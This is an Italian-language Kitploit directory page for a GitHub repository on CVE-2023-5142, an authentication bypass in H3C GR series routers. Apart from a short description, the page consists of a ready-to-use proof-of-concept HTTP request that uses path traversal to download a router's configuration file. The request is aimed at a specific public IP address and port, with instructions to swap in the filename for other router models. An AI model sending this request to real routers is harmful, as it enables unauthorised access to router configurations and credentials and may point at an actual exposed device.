Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-H3C-Report — CVE-2023-5142 | Kitploit
Strumenti/GitHubGitHub/kuangxiaotu/cve-h3c-report
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniConfigurazione Errata
GitHubkuangxiaotu/cve-h3c-report

CVE-H3C-Report

CVE-2023-5142

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

La gestione del sistema dei router della serie H3C GR presenta una vulnerabilità di accesso non autorizzato

Prodotto: Router serie GR

versione: tutte

valutazione: alto rischio

sito web: http://www.h3c.com/

Rischi: Gli aggressori possono sfruttare questa vulnerabilità per ottenere informazioni sensibili dai router costruendo pacchetti di richiesta speciali per bypassare la verifica dell'identità.

principio: Il router non autentica l'accesso alle directory e ai file correlati

exp:

Nota: È necessario modificare il suffisso del nome file nel POC, ad esempio GR8300.cfg

root@kitploit:~
GET /userLogin.asp/../actionpolicy_status/../GR1100-P.cfg HTTP/1.1
Host: 59.35.220.76:8989
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

image

image

image

Scarica lo strumento